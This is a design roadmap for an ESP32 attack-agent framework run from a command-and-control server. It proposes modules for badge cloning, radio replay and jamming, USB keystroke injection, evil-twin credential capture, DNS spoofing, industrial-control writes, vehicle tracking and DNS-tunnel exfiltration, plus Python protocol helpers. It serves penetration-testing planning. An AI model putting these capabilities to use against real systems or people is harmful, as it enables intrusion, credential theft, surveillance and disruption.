espilon-source/MODULE_IDEAS.md

Espilon Module Ideas

Future module ideas for the Espilon agent framework, organized by category. Each entry includes hardware requirements, estimated cost, complexity (1-5), and key C2 commands.

Legend: Complexity 1 = simple wrapper, 5 = full protocol stack. Cost = additional hardware beyond ESP32.


Table of Contents

  • Radio & Wireless
  • USB & HID
  • Hardware Hacking
  • Network & Protocols
  • Industrial & SCADA
  • Exfiltration & Covert Channels
  • Sensors & Environment
  • Crypto & WiFi Attacks
  • Automotive
  • Physical Security
  • Priority Matrix

Radio & Wireless

mod_ble — Bluetooth Low Energy

Hardware: ESP32 built-in | Cost: 0 EUR | Complexity: 3/5

BLE scanning, GATT enumeration, beacon spoofing, and device tracking.

Commands:

  • ble_scan [duration] — Discover BLE devices (name, RSSI, services)
  • ble_enum <addr> — Enumerate GATT services and characteristics
  • ble_read <addr> <handle> — Read characteristic value
  • ble_write <addr> <handle> <hex> — Write to characteristic
  • ble_beacon <uuid> [major] [minor] — Spoof iBeacon/Eddystone
  • ble_track <addr> [duration] — Track device RSSI over time
  • ble_flood [count] — Broadcast random BLE advertisements

Use cases: IoT device recon, BLE lock testing, asset tracking, Bluetooth phishing.
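The payload ble_beacon would transmit and ble_scan would have to recognise is a fixed 30-byte structure. The following is an added example, not Espilon code: it builds an iBeacon advertisement from Apple's published layout (Flags AD structure, then Manufacturer Specific Data with company ID 0x004C, type 0x02, length 0x15, 16-byte UUID, big-endian major/minor, signed TX power) and parses one back out of raw advertising data. The sample UUID in the usage block is a constructed value.

```python
"""iBeacon advertising payload: build for ble_beacon, parse for ble_scan.

Added example, not Espilon code. Assumes Apple's published layout:
Flags AD structure, then a Manufacturer Specific Data AD structure with
company ID 0x004C, type 0x02, length 0x15, 16-byte UUID, major, minor,
measured TX power at 1 m (signed byte).
"""
import struct
import uuid
from typing import List, Optional, Tuple

APPLE_COMPANY_ID = 0x004C          # little-endian on the wire: 4C 00
IBEACON_TYPE, IBEACON_LEN = 0x02, 0x15
AD_FLAGS, AD_MFG_DATA = 0x01, 0xFF


def build_ibeacon_adv(proximity_uuid: str, major: int, minor: int, tx_power: int = -59) -> bytes:
    """Return the 30-byte advertising data an iBeacon transmits."""
    if not (0 <= major <= 0xFFFF and 0 <= minor <= 0xFFFF):
        raise ValueError("major/minor must fit in 16 bits")
    if not (-128 <= tx_power <= 127):
        raise ValueError("tx_power must be a signed byte")
    # Flags: LE General Discoverable Mode, BR/EDR Not Supported (0x06)
    flags = bytes([0x02, AD_FLAGS, 0x06])
    payload = (struct.pack("<H", APPLE_COMPANY_ID)
               + bytes([IBEACON_TYPE, IBEACON_LEN])
               + uuid.UUID(proximity_uuid).bytes
               + struct.pack(">HHb", major, minor, tx_power))   # big-endian, as Apple specifies
    mfg = bytes([len(payload) + 1, AD_MFG_DATA]) + payload      # length byte covers type + payload
    return flags + mfg


def parse_ad_structures(adv: bytes) -> List[Tuple[int, bytes]]:
    """Split raw advertising data into (ad_type, payload) pairs; a zero length byte ends the data."""
    out, i = [], 0
    while i < len(adv):
        length = adv[i]
        if length == 0:
            break
        if i + 1 + length > len(adv):
            raise ValueError("truncated AD structure")
        out.append((adv[i + 1], adv[i + 2:i + 1 + length]))
        i += 1 + length
    return out


def parse_ibeacon(adv: bytes) -> Optional[dict]:
    """Return the iBeacon fields if the advertisement carries one, else None."""
    for ad_type, payload in parse_ad_structures(adv):
        if ad_type != AD_MFG_DATA or len(payload) != 25:
            continue
        (company,) = struct.unpack("<H", payload[:2])
        if company != APPLE_COMPANY_ID or payload[2:4] != bytes([IBEACON_TYPE, IBEACON_LEN]):
            continue
        major, minor, tx_power = struct.unpack(">HHb", payload[20:25])
        return {"uuid": str(uuid.UUID(bytes=payload[4:20])),
                "major": major, "minor": minor, "tx_power": tx_power}
    return None


if __name__ == "__main__":
    # Sample UUID is a constructed value, not a real deployment.
    adv = build_ibeacon_adv("e2c56db5-dffb-48d2-b060-d0f5a71096e0", 1, 2)
    print(adv.hex(), parse_ibeacon(adv))
```

A scanner on the ESP32 receives the advertising data as one byte string; parse_ad_structures is the generic step, and the iBeacon check is only a filter on one manufacturer-specific entry, so Eddystone (a Service Data structure instead) slots in as another filter on the same list.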


mod_zigbee — IEEE 802.15.4 / Zigbee

Hardware: CC2530/CC2531 module via UART | Cost: ~4 EUR | Complexity: 4/5

Sniff, inject, and replay Zigbee/802.15.4 frames. Targets smart home (Philips Hue, SmartThings, Ikea). Note on zigbee_key_sniff: the network key is transported encrypted under the Trust Center link key, so a capture is only directly decryptable where the well-known default key (ZigBeeAlliance09) is still in use; otherwise it is material for offline work, not an instant key.

Commands:

  • zigbee_scan [channel] — Discover Zigbee networks and devices
  • zigbee_sniff <channel> [duration] — Capture 802.15.4 frames
  • zigbee_inject <channel> <hex_frame> — Inject raw frame
  • zigbee_replay — Replay captured frames
  • zigbee_key_sniff [duration] — Capture transport key exchange
  • zigbee_jam <channel> — Channel jamming

Use cases: Smart home testing, IoT protocol analysis, Zigbee network penetration.


mod_nfc — RFID / NFC

Hardware: RC522 (MIFARE) or PN532 (full NFC) via SPI | Cost: ~3 EUR | Complexity: 3/5

Read, write, clone, and emulate RFID/NFC tags. Supports MIFARE Classic, NTAG, and ISO 14443. Caveat: the RC522 has no card-emulation mode, and PN532 emulation cannot present an arbitrary 4-byte UID (it answers with a random 0x08-prefixed UID), so nfc_emulate needs a different reader chip or a UID-changeable "magic" card written via nfc_write.

Commands:

  • nfc_scan — Detect tags in range (UID, type, ATQA, SAK)
  • nfc_read <sector> [key] — Read MIFARE sector
  • nfc_write <sector> <hex> [key] — Write to sector
  • nfc_clone — Read tag → store → emulate (UID-level clone)
  • nfc_crack <sector> — MIFARE Classic key recovery (nested on-device; hardnested needs the C2 host's CPU and RAM)
  • nfc_dump — Dump full tag contents
  • nfc_emulate <uid> — Emulate tag UID

Use cases: Access card cloning, NFC payment research, badge system testing.


mod_subghz — Sub-GHz Radio (433/868/915 MHz)

Hardware: CC1101 module via SPI | Cost: ~3 EUR | Complexity: 4/5

Sniff, decode, record, and replay sub-GHz radio signals. Targets garage doors, remotes, weather stations, sensors.

Commands:

  • subghz_rx <freq_mhz> [modulation] — Listen on frequency (ASK/FSK/GFSK)
  • subghz_tx <freq_mhz> <hex_data> [repeat] — Transmit raw data
  • subghz_scan <start_mhz> <end_mhz> — Frequency scanner (find active freqs)
  • subghz_record <freq_mhz> [duration] — Record raw signal
  • subghz_replay [speed] — Replay recorded signal
  • subghz_decode <protocol> — Decode known protocols (Oregon, LaCrosse, etc.)
  • subghz_bruteforce <freq_mhz> <bits> [delay] — Brute-force fixed codes

Use cases: Garage door testing, remote control analysis, sensor spoofing, ISM band recon.


mod_lora — LoRa Long-Range Mesh

Hardware: SX1276/SX1278 module via SPI | Cost: ~5 EUR | Complexity: 3/5

LoRa-based backup C2 channel and mesh network for long-range, low-bandwidth communication.

Commands:

  • lora_start <freq_mhz> [sf] [bw] — Init LoRa radio (spreading factor, bandwidth)
  • lora_send <hex_data> — Send raw LoRa packet
  • lora_listen [duration] — Receive packets
  • lora_mesh_start — Enable mesh relay mode (multi-hop)
  • lora_c2_enable — Use LoRa as backup C2 channel
  • lora_range_test — Ping-pong range measurement

Use cases: Backup C2 (1-10 km range), field mesh network, exfiltration when WiFi unavailable.


mod_ir — Infrared TX/RX

Hardware: IR LED + IR receiver (VS1838B) | Cost: ~1 EUR | Complexity: 2/5

Capture, decode, and replay infrared remote signals. Universal remote functionality.

Commands:

  • ir_learn [timeout] — Record IR signal from any remote
  • ir_send <protocol> <code> — Send known protocol (NEC, Sony, RC5, Samsung)
  • ir_replay — Replay last captured signal
  • ir_scan — Brute-force common power codes (TV-B-Gone style)
  • ir_raw_send <timing_data> — Send raw pulse/space timing

Use cases: TV/AC control, IR protocol analysis, physical access (some locks use IR).


mod_espnow_swarm — Coordinated ESP-NOW Swarm

Hardware: Additional ESP32 agents (no add-on modules) | Cost: one ESP32 per extra agent | Complexity: 4/5

Coordinate multiple Espilon agents via ESP-NOW for distributed operations. Mesh-aware task distribution.

Commands:

  • swarm_discover — Find nearby Espilon agents
  • swarm_broadcast <command> — Send command to all agents
  • swarm_assign <agent_id> <command> — Targeted task assignment
  • swarm_sync — Synchronize clocks for coordinated actions
  • swarm_scan_distributed <target> — Parallel network scanning from multiple positions
  • swarm_relay <agent_id> — Use agent as relay for out-of-range C2

Use cases: Distributed WiFi scanning, coordinated deauth, coverage extension, multi-angle recon.


mod_tpms — Tire Pressure Monitoring

Hardware: CC1101 (315 or 433 MHz) | Cost: ~3 EUR | Complexity: 3/5

Sniff and spoof TPMS sensors at 315/433 MHz. Vehicle identification via unique sensor IDs.

Commands:

  • tpms_listen [duration] — Capture TPMS broadcasts
  • tpms_decode — Show decoded sensor data (pressure, temp, ID)
  • tpms_track <sensor_id> — Track specific vehicle presence
  • tpms_spoof <sensor_id> <pressure> <temp> — Inject fake reading

Use cases: Vehicle tracking via TPMS IDs, TPMS protocol research.


USB & HID

mod_badusb — USB HID Injection

Hardware: ESP32-S2 or ESP32-S3 (native USB) | Cost: 0 EUR | Complexity: 3/5

Keystroke injection attack via USB HID. Triggered remotely from C2.

Commands:

  • badusb_run <payload_name> — Execute named payload
  • badusb_type <text> — Type arbitrary text
  • badusb_key <combo> — Send key combo (e.g., WIN+R, CTRL+ALT+DEL)
  • badusb_delay <ms> — Wait between keystrokes
  • badusb_upload <script> — Upload Ducky Script payload
  • badusb_list — List stored payloads
  • badusb_os_detect — Fingerprint the host OS from its USB enumeration behaviour (which descriptors it requests, in what order, and with what timing)

Use cases: Physical access exploitation, credential harvesting, reverse shell deployment.


mod_rubber_ducky — Ducky Script Interpreter

Hardware: ESP32-S2/S3 | Cost: 0 EUR | Complexity: 2/5

Full Ducky Script interpreter for scripted USB HID payloads. Companion to mod_badusb.

Commands:

  • ducky_load <script> — Load script from NVS or C2
  • ducky_exec — Execute loaded script
  • ducky_store <name> <script> — Save payload to NVS
  • ducky_list — List stored scripts
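What ducky_exec and badusb_run actually have to produce is a sequence of 8-byte boot-keyboard reports with delays between them. The following is an added example, not Espilon code: a minimal interpreter for the Ducky Script subset REM, DELAY, STRING, single named keys and modifier combos ("GUI r", "CTRL ALT DELETE") that emits those reports. It assumes a US keyboard layout on the target (other layouts move the punctuation keycodes) and follows every press with an all-zero release report.

```python
"""Ducky Script subset -> USB HID boot-keyboard reports.

Added example, not Espilon code. Handles REM, DELAY, STRING, single named
keys (ENTER, TAB, ...) and modifier combos such as "GUI r" or
"CTRL ALT DELETE". Assumes a US keyboard layout on the target; every
press is followed by an all-zero release report.
"""
from typing import List, Tuple, Union

# HID usage IDs from the Keyboard/Keypad usage page (0x07), US layout.
_LETTERS = {chr(ord("a") + i): 0x04 + i for i in range(26)}
_DIGITS = {str(d): 0x1E + d - 1 for d in range(1, 10)}
_DIGITS["0"] = 0x27
_PUNCT = {" ": 0x2C, "-": 0x2D, "=": 0x2E, "[": 0x2F, "]": 0x30, "\\": 0x31,
          ";": 0x33, "'": 0x34, "`": 0x35, ",": 0x36, ".": 0x37, "/": 0x38}
# Characters that are SHIFT + another key on a US layout.
_SHIFTED = {"!": "1", "@": "2", "#": "3", "$": "4", "%": "5", "^": "6", "&": "7",
            "*": "8", "(": "9", ")": "0", "_": "-", "+": "=", "{": "[", "}": "]",
            "|": "\\", ":": ";", '"': "'", "~": "`", "<": ",", ">": ".", "?": "/"}
_NAMED = {"ENTER": 0x28, "ESC": 0x29, "ESCAPE": 0x29, "BACKSPACE": 0x2A, "TAB": 0x2B,
          "SPACE": 0x2C, "DELETE": 0x4C, "RIGHT": 0x4F, "LEFT": 0x50, "DOWN": 0x51, "UP": 0x52}
# Modifier bits of report byte 0 (left-hand modifiers).
_MODS = {"CTRL": 0x01, "CONTROL": 0x01, "SHIFT": 0x02, "ALT": 0x04, "GUI": 0x08, "WINDOWS": 0x08}

Event = Tuple[str, Union[int, bytes]]   # ("delay", ms) or ("report", 8 bytes)


def hid_report(mods: int = 0, key: int = 0) -> bytes:
    """8-byte boot protocol report: modifiers, reserved, up to six keycodes (one used here)."""
    return bytes([mods, 0, key, 0, 0, 0, 0, 0])


def char_to_report(ch: str) -> bytes:
    """Press report for one printable character (US layout)."""
    if ch in _LETTERS:
        return hid_report(0, _LETTERS[ch])
    if ch.lower() in _LETTERS:                       # upper-case ASCII letter
        return hid_report(_MODS["SHIFT"], _LETTERS[ch.lower()])
    if ch in _DIGITS:
        return hid_report(0, _DIGITS[ch])
    if ch in _PUNCT:
        return hid_report(0, _PUNCT[ch])
    if ch in _SHIFTED:
        base = _SHIFTED[ch]
        return hid_report(_MODS["SHIFT"], _DIGITS.get(base) or _PUNCT[base])
    raise ValueError(f"unsupported character {ch!r}")


def compile_ducky(script: str) -> List[Event]:
    """Turn a script into the ordered list of delays and HID reports to send."""
    events: List[Event] = []

    def press(report: bytes) -> None:
        events.append(("report", report))
        events.append(("report", hid_report()))      # release everything

    for raw in script.splitlines():
        line = raw.rstrip("\r")
        if not line.strip() or line.startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        if cmd == "DELAY":
            events.append(("delay", int(arg)))
        elif cmd == "STRING":
            for ch in arg:
                press(char_to_report(ch))
        elif cmd in _NAMED:
            press(hid_report(0, _NAMED[cmd]))
        elif cmd in _MODS:
            mods, key = 0, 0
            for token in line.split():
                if token in _MODS:
                    mods |= _MODS[token]
                elif token in _NAMED:
                    key = _NAMED[token]
                elif len(token) == 1:
                    key = char_to_report(token.lower())[2]   # keycode byte of the report
                else:
                    raise ValueError(f"unknown key {token!r}")
            press(hid_report(mods, key))
        else:
            raise ValueError(f"unknown command {cmd!r}")
    return events


if __name__ == "__main__":
    for kind, value in compile_ducky("REM demo\nGUI r\nDELAY 500\nSTRING cmd\nENTER\n"):
        print(kind, value.hex() if isinstance(value, bytes) else value)
```

On the ESP32-S2/S3 each ("report", ...) entry is one HID IN report handed to the TinyUSB keyboard interface, and ("delay", ms) is a vTaskDelay; the interpreter itself needs no USB code, which keeps it testable on the host.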

mod_usb_mitm — USB Man-in-the-Middle

Hardware: ESP32-S3 (USB OTG host/device) plus a second USB interface | Cost: 0 EUR for the S3 itself, second controller extra | Complexity: 5/5

Transparent USB proxy: sniff, modify, or inject traffic between host and device. Caveat: the ESP32-S3 has a single USB OTG controller, and its USB-Serial-JTAG controller shares the same GPIO19/20 pins, so acting as a device towards the host and as a host towards the target at the same time needs a second USB controller (or a second S3 bridged over SPI/UART). The S3 is full-speed (12 Mbit/s) only, so high-speed devices cannot be proxied transparently.

Commands:

  • usb_mitm_start — Start USB proxy
  • usb_mitm_sniff [class] — Log traffic (HID, mass storage, etc.)
  • usb_mitm_inject <hex> — Inject USB packets
  • usb_mitm_filter <rule> — Modify packets in transit

Use cases: USB protocol analysis, keyboard sniffing, mass storage interception.


Hardware Hacking

mod_jtag — JTAG/SWD Debug Interface

Hardware: GPIO wires (no extra module) | Cost: 0 EUR | Complexity: 4/5

Bit-bang JTAG/SWD for firmware extraction, debug access, and boundary scan on target devices.

Commands:

  • jtag_scan — Detect JTAG chain (IDCODE scan)
  • jtag_read <addr> <size> — Read memory via debug port
  • jtag_write <addr> <hex> — Write memory
  • jtag_dump <addr> <size> — Dump firmware to C2
  • swd_scan — Detect SWD target
  • swd_read <addr> <size> — Read via SWD
  • swd_halt / swd_resume — Halt/resume target CPU

Use cases: Firmware extraction from IoT devices, finding debug ports left unlocked or with read-out protection misconfigured, live debugging.


mod_uart_bridge — UART Sniff/Inject

Hardware: GPIO wires (no extra module) | Cost: 0 EUR | Complexity: 2/5

UART bridge: sniff serial console traffic or inject commands. Auto-detect baud rate.

Commands:

  • uart_scan [gpio] — Auto-detect baud rate on GPIO pin
  • uart_listen <baud> <rx_gpio> [duration] — Sniff UART traffic
  • uart_send <baud> <tx_gpio> <data> — Send data
  • uart_bridge <baud> <rx> <tx> — Bidirectional bridge (relay to C2)

Use cases: Router console access, IoT device debug ports, embedded system exploitation.
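uart_scan's auto-detection rests on one observation: the shortest gap between two level changes on an asynchronous serial line is one bit time. The following is an added example, not Espilon code, of that estimator. On hardware the edge timestamps would come from a GPIO interrupt or the RMT peripheral; here a simulator generates them (8N1 framing, idle-high line, deterministic jitter) so the logic runs offline. It also handles the failure mode a practitioner hits first: a capture with no lone one-bit pulse makes every estimator report a sub-multiple of the true rate.

```python
"""Estimate a UART baud rate from the timing of RX line edges (uart_scan).

Added example, not Espilon code. On hardware the edge timestamps would come
from a GPIO interrupt or the RMT peripheral; here they are produced by a
simulator so the logic runs offline. Assumes 8N1 framing and an idle-high line.
"""
from typing import List

STANDARD_BAUDS = [1200, 2400, 4800, 9600, 19200, 38400, 57600, 74880,
                  115200, 230400, 460800, 921600]


def uart_frame_bits(byte: int) -> List[int]:
    """8N1: start bit (0), eight data bits LSB first, one stop bit (1)."""
    return [0] + [(byte >> i) & 1 for i in range(8)] + [1]


def simulate_edges(data: bytes, baud: int, jitter_us: float = 0.0, idle_bits: int = 4) -> List[float]:
    """Constructed capture: timestamps in microseconds of every level change while
    `data` is sent as 8N1 frames separated by `idle_bits` of idle line."""
    bit_us = 1_000_000 / baud
    level, t, edges = 1, 0.0, []
    for byte in data:
        for bit in uart_frame_bits(byte) + [1] * idle_bits:
            if bit != level:
                # deterministic -1/0/+1 * jitter so results are reproducible
                edges.append(t + jitter_us * ((len(edges) % 3) - 1))
                level = bit
            t += bit_us
    return edges


def estimate_baud(edges: List[float], tolerance: float = 0.15) -> int:
    """Lowest standard rate at which every intra-frame gap is a whole number of bit
    times (within `tolerance` of a bit). Lowest wins because a capture that fits
    at rate R also fits at 2R, 4R, ... Gaps longer than 12 shortest gaps are treated
    as idle time between bursts and ignored. If no byte in the capture produces a
    lone 1-bit pulse the estimate is a sub-multiple of the true rate, so sample a
    varied burst such as a boot log rather than a run of 0x00 or 0xFF."""
    gaps = [b - a for a, b in zip(edges, edges[1:])]
    if not gaps:
        raise ValueError("need at least two edges")
    shortest = min(gaps)
    gaps = [g for g in gaps if g <= 12 * shortest]
    for baud in STANDARD_BAUDS:
        bit_us = 1_000_000 / baud
        ok = True
        for g in gaps:
            bits = g / bit_us
            if round(bits) < 1 or abs(bits - round(bits)) > tolerance:
                ok = False
                break
        if ok:
            return baud
    raise ValueError("no standard baud rate fits the capture")


if __name__ == "__main__":
    capture = simulate_edges(b"U-Boot 2020.04 (constructed boot log)\r\n", 115200, jitter_us=0.4)
    print(len(capture), "edges ->", estimate_baud(capture), "baud")
```

Checking that every gap is an integer number of bit times is more robust than taking 1/min_gap directly: a single glitch edge then fails the consistency test instead of silently doubling the estimate. On the ESP32, 115200 and above leave about 8.7 us per bit, which is beyond what a GPIO interrupt handler timestamps reliably; the RMT receiver captures the pulse widths in hardware and feeds the same function.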


mod_i2c_scan — I2C Bus Discovery

Hardware: GPIO wires | Cost: 0 EUR | Complexity: 2/5

Scan, read, and write I2C devices. EEPROM dumping and sensor spoofing.

Commands:

  • i2c_scan [sda] [scl] — Discover devices on bus
  • i2c_read <addr> <reg> <len> — Read registers
  • i2c_write <addr> <reg> <hex> — Write registers
  • i2c_dump_eeprom <addr> <size> — Dump EEPROM contents

Use cases: EEPROM credential extraction, sensor data manipulation, I2C device enumeration.


mod_spi_flash — SPI Flash Dumper

Hardware: SOIC-8 clip + GPIO wires | Cost: ~5 EUR | Complexity: 3/5

Read/write SPI NOR flash chips (25xx series). In-circuit or off-board.

Commands:

  • spi_flash_detect — Read JEDEC ID, detect chip
  • spi_flash_read <addr> <size> — Read flash to C2
  • spi_flash_write <addr> <hex> — Write data
  • spi_flash_erase <addr> <size> — Erase sectors
  • spi_flash_dump — Full chip dump

Use cases: Firmware extraction, credential recovery, flash image modification.


mod_glitch — Voltage/Clock Glitching

Hardware: MOSFET + GPIO (voltage glitch) or clock inject circuit | Cost: ~5 EUR | Complexity: 5/5

Fault injection: precise voltage or clock glitches to bypass secure boot, skip instructions, or corrupt crypto. Caveat: software GPIO toggling on the ESP32 jitters by tens of nanoseconds, so the glitch pulse should be generated by a hardware peripheral (the RMT unit gives 12.5 ns ticks from its 80 MHz clock), and the nanosecond parameters in glitch_config are effectively multiples of that tick.

Commands:

  • glitch_config <width_ns> <offset_ns> <repeat> — Set glitch parameters
  • glitch_arm <trigger_gpio> — Arm, fire on trigger edge
  • glitch_fire — Manual trigger
  • glitch_sweep <start_ns> <end_ns> <step> — Automated parameter sweep

Use cases: Secure boot bypass, read-out protection defeat, crypto fault injection.


Network & Protocols

mod_dns — DNS Spoofing & Tunneling

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 3/5

DNS server for spoofing + DNS tunnel for covert data exfiltration through firewalls.

Commands:

  • dns_spoof_start <domain> <ip> — Spoof specific domain resolution
  • dns_spoof_all <ip> — Redirect all DNS queries to IP
  • dns_spoof_stop — Stop spoofing
  • dns_tunnel_start <domain> — Start DNS tunnel (data over TXT/CNAME)
  • dns_tunnel_send <hex> — Exfiltrate data via DNS

Use cases: Pharming, captive portal bypass, firewall evasion, covert exfiltration.


mod_dhcp — DHCP Attacks

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 3/5

DHCP starvation and rogue DHCP server for MitM via gateway redirection.

Commands:

  • dhcp_starve [count] — Exhaust DHCP pool with fake MACs
  • dhcp_rogue_start <gateway_ip> <dns_ip> — Start rogue DHCP server
  • dhcp_rogue_stop — Stop rogue server
  • dhcp_discover — Passive DHCP monitoring

Use cases: MitM setup, network disruption, rogue gateway for traffic interception.


mod_mdns — mDNS/Bonjour Discovery

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 2/5

Discover and spoof local services via mDNS (Bonjour, Avahi).

Commands:

  • mdns_scan [duration] — Discover all mDNS services
  • mdns_query <service> — Query specific service type (_http._tcp, _ssh._tcp, etc.)
  • mdns_spoof <hostname> <ip> — Spoof mDNS response
  • mdns_register <service> <port> — Advertise fake service

Use cases: Local service enumeration, service spoofing, printer/AirPlay impersonation.


mod_mqtt — MQTT Broker/Client

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 3/5

MQTT client for IoT device interaction + rogue broker for message interception.

Commands:

  • mqtt_connect <broker> [user] [pass] — Connect to broker
  • mqtt_sub <topic> — Subscribe and stream messages to C2
  • mqtt_pub <topic> <payload> — Publish message
  • mqtt_enum — Enumerate all topics (wildcard subscribe)
  • mqtt_broker_start [port] — Start rogue MQTT broker
  • mqtt_intercept <topic> — MitM specific topic

Use cases: IoT device control, smart home exploitation, message injection, credential sniffing.


mod_coap — CoAP Discovery & Exploitation

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 3/5

CoAP client for constrained IoT device interaction (UDP-based REST).

Commands:

  • coap_discover <ip> — Discover CoAP resources (.well-known/core)
  • coap_get <uri> — GET resource
  • coap_put <uri> <payload> — PUT resource
  • coap_observe <uri> — Subscribe to resource changes

Use cases: IoT device enumeration, sensor data extraction, actuator control.


mod_upnp — UPnP/SSDP Discovery

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 2/5

Discover and interact with UPnP devices on the network. Map router port forwards.

Commands:

  • upnp_scan — Discover UPnP devices (SSDP M-SEARCH)
  • upnp_describe <url> — Get device description XML
  • upnp_port_map <ext_port> <int_ip> <int_port> — Add port mapping on router
  • upnp_port_list — List existing port mappings
  • upnp_port_del <ext_port> — Remove port mapping

Use cases: Router exploitation, port mapping for persistence, device enumeration.


mod_socks — SOCKS5 Proxy

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 3/5

Full SOCKS5 proxy running on the agent for network pivoting.

Commands:

  • socks_start [port] [auth] — Start SOCKS5 server
  • socks_stop — Stop proxy
  • socks_status — Active connections, bandwidth stats
  • socks_whitelist <ip> — Allow only specific clients

Use cases: Network pivoting, traffic routing through agent, accessing internal networks.


mod_wifi_rogue — Advanced Evil Twin

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 5/5

WPA2-Enterprise Evil Twin with EAP credential interception (EAP-TTLS, PEAP, MSCHAPv2). Note: PEAP/MSCHAPv2 yields a challenge/response pair for offline cracking, not the password itself; EAP-TTLS/PAP yields it in the clear. Clients that validate the RADIUS server certificate will not complete the exchange.

Commands:

  • rogue_start <ssid> [eap_type] — Start evil twin with RADIUS
  • rogue_stop — Stop
  • rogue_creds — List captured credentials
  • rogue_deauth <bssid> <station> — Force client reconnection to rogue AP

Use cases: Enterprise WiFi credential harvesting, WPA2-Enterprise testing.


Industrial & SCADA

mod_modbus — Modbus TCP/RTU

Hardware: None (TCP) or MAX485 (~2 EUR for RTU) | Cost: 0-2 EUR | Complexity: 3/5

Modbus protocol for SCADA/ICS reconnaissance and interaction. Modbus has no authentication, so any write (modbus_write, coil writes) changes plant state directly; keep writes behind an explicit confirmation and default modbus_scan/modbus_enum to read-only function codes.

Commands:

  • modbus_scan <ip_range> — Discover Modbus TCP devices
  • modbus_read <ip> <unit> <addr> <count> [type] — Read holding/input registers
  • modbus_write <ip> <unit> <addr> <value> — Write register
  • modbus_coils <ip> <unit> <addr> <count> — Read/write coils
  • modbus_enum <ip> — Enumerate function codes and unit IDs
  • modbus_rtu_scan <baud> — Scan RTU bus (RS-485)

Use cases: SCADA assessment, PLC interaction, industrial network mapping.
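Every command above reduces to a 7-byte MBAP header (transaction ID, protocol ID 0, remaining length, unit ID) followed by a PDU whose first byte is the function code. The following is an added example, not Espilon code: it builds a Read Holding Registers (function 3) request, builds the normal and exception responses a PLC would return, and parses either back, including the two checks a scanner needs before trusting a reply (protocol ID 0 and MBAP length matching the frame). The register values and unit IDs are constructed.

```python
"""Modbus TCP framing for Read Holding Registers (function 3).

Added example, not Espilon code. Frames here are constructed; a real
modbus_read would send build_read_holding() over TCP port 502 and hand
the reply to parse_response().
"""
import struct
from typing import List, Tuple

MBAP_LEN = 7
FC_READ_HOLDING = 0x03
EXCEPTION_NAMES = {1: "ILLEGAL FUNCTION", 2: "ILLEGAL DATA ADDRESS",
                   3: "ILLEGAL DATA VALUE", 4: "SLAVE DEVICE FAILURE",
                   10: "GATEWAY PATH UNAVAILABLE", 11: "GATEWAY TARGET DEVICE FAILED TO RESPOND"}


def _mbap(tid: int, unit: int, pdu: bytes) -> bytes:
    # length field counts the unit id plus the PDU
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def build_read_holding(tid: int, unit: int, addr: int, count: int) -> bytes:
    """Request: FC 03, starting address, register count (spec limit 125)."""
    if not 1 <= count <= 125:
        raise ValueError("count must be 1..125 for function 3")
    return _mbap(tid, unit, struct.pack(">BHH", FC_READ_HOLDING, addr, count))


def build_read_holding_response(tid: int, unit: int, values: List[int]) -> bytes:
    """Normal response: FC 03, byte count, then 16-bit big-endian registers."""
    pdu = struct.pack(">BB", FC_READ_HOLDING, 2 * len(values)) + struct.pack(f">{len(values)}H", *values)
    return _mbap(tid, unit, pdu)


def build_exception(tid: int, unit: int, fc: int, code: int) -> bytes:
    """Exception response: function code with bit 7 set, then the exception code."""
    return _mbap(tid, unit, struct.pack(">BB", fc | 0x80, code))


def parse_response(frame: bytes) -> Tuple[int, int, dict]:
    """Return (tid, unit, result); result holds "registers" or "exception"."""
    if len(frame) < MBAP_LEN + 2:
        raise ValueError("frame too short")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:MBAP_LEN])
    if proto != 0:
        raise ValueError("not Modbus (protocol id != 0)")
    if length != len(frame) - 6:
        raise ValueError("MBAP length does not match frame size")
    fc = frame[7]
    if fc & 0x80:
        code = frame[8]
        return tid, unit, {"function": fc & 0x7F,
                           "exception": EXCEPTION_NAMES.get(code, f"code {code}")}
    if fc == FC_READ_HOLDING:
        byte_count = frame[8]
        data = frame[9:9 + byte_count]
        if len(data) != byte_count or byte_count % 2:
            raise ValueError("bad byte count")
        return tid, unit, {"registers": list(struct.unpack(f">{byte_count // 2}H", data))}
    raise ValueError(f"unsupported function {fc}")


if __name__ == "__main__":
    print(build_read_holding(1, 1, 0, 2).hex())
    print(parse_response(build_read_holding_response(1, 1, [0x1234, 0xABCD])))
    print(parse_response(build_exception(2, 7, FC_READ_HOLDING, 11)))
```

For modbus_enum, the exception codes are the signal: a gateway answers probes at unused unit IDs with code 11 (target device failed to respond), a live device answers an unsupported function with code 1, and a valid function at an invalid address with code 2, so the same parser maps the device without a single write.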


mod_bacnet — Building Automation

Hardware: None (WiFi/Ethernet) | Cost: 0 EUR | Complexity: 4/5

BACnet protocol for building automation system interaction (HVAC, lighting, access).

Commands:

  • bacnet_discover — Who-Is broadcast, discover BACnet devices
  • bacnet_read <device> <object> <property> — Read property
  • bacnet_write <device> <object> <property> <value> — Write property
  • bacnet_enum <device> — Enumerate objects on device

Use cases: Building automation testing, HVAC control, access system research.


mod_ethernet — Wired Ethernet (W5500)

Hardware: W5500 or ENC28J60 SPI module | Cost: ~4 EUR | Complexity: 3/5

Wired Ethernet connectivity — bypass WiFi isolation, direct LAN access.

Commands:

  • eth_start [dhcp|static <ip>] — Init Ethernet interface
  • eth_status — Link state, IP config
  • eth_scan — ARP scan on wired LAN
  • eth_bridge — Bridge WiFi ↔ Ethernet traffic

Use cases: Drop box on wired network, bypass wireless ACLs, physical pentesting.


Exfiltration & Covert Channels

mod_dns_tunnel — C2 over DNS

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 4/5

Full C2 communication over DNS queries/responses. Works wherever the agent can reach a resolver that recurses to the internet, which covers many networks that block direct egress; expect low throughput (tens of bytes per query) and a visible trail in resolver logs.

Commands:

  • dns_c2_start <domain> <resolver> — Start DNS C2 channel
  • dns_c2_stop — Revert to TCP
  • dns_c2_status — Throughput, latency stats

Use cases: Firewall bypass, restricted network C2, exfiltration through corporate DNS.
